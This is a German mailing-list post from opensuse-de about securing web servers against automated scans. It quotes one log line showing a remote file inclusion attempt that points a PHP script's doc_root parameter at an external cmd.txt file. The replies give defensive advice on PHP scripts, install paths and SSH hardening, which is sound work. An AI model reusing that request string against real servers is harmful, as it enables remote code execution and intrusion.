On Fri, 18 Jan 2008 11:40:22 +0100, Michael Raab <ml-lists@macbyte.info> wrote:
Am Freitag, 18. Januar 2008 11:21:03 schrieb Juergen Langowski:
On Fri, 18 Jan 2008 10:29:34 +0100, Ralf Schneider
(...)
Beliebte Einfallstore sind unsichere PHP-Skripte, z.B. Content-Management-Systeme, Gästebücher, Formulare.
Im Log bei mir ist haufenweise sowas zu finden /intern/modules/addons/plugin.php?doc_root=http://charitygrants.org/images/cmd.txt?
Ist das ein Versuch solch ein Backdoor zu installieren?
Es gibt automatisierte Skripte, die Server auf Lücken abklopfen und z.B. nach Standard-Installationspfaden (und nach Lücken) von myPHPAdmin usw. suchen. Dazu wird auch gern mal ein bereits gekaperter Rootserver benutzt, der dann seinerseits rund um die Uhr nach anfälligen Kollegen sucht. Für sich genommen sind diese Aufrufe noch nicht schlimm, solange die Skripte sicher sind. Unterbinden kann man sie sowieso nicht, denn sobald ein Webserver im Netz "sichtbar" wird, ist er solchen Testbohrungen ausgesetzt. Das gehört zum Grundrauschen. Bei MyPHPAdmin und anderswo sollte man die Sicherheitshinweise beachten (mit Passwort absichern usw.), und wenn man die Installation in ein selbst definiertes Verzeichnis vornimmt, statt der Standardvorgabe zu folgen, bremst man schon mal die automatisierten Skripte aus. Letzteres trägt nicht wesentlich zur Sicherheit bei, entfernt aber schon mal ein Menge Gerümpel aus den Logfiles. Gleiches gilt für das SSH-Login. Aus Sicherheitsgründen lassen wir nur noch Login mit Key für einen normalen Benutzer zu (nicht root) und haben außerdem den Port verlegt, was die meisten automatisierten Skripte ins Leere laufen lässt und die Logfiles erheblich übersichtlicher macht. Jürgen -- Um die Liste abzubestellen, schicken Sie eine Mail an: opensuse-de+unsubscribe@opensuse.org Um eine Liste aller verfuegbaren Kommandos zu bekommen, schicken Sie eine Mail an: opensuse-de+help@opensuse.org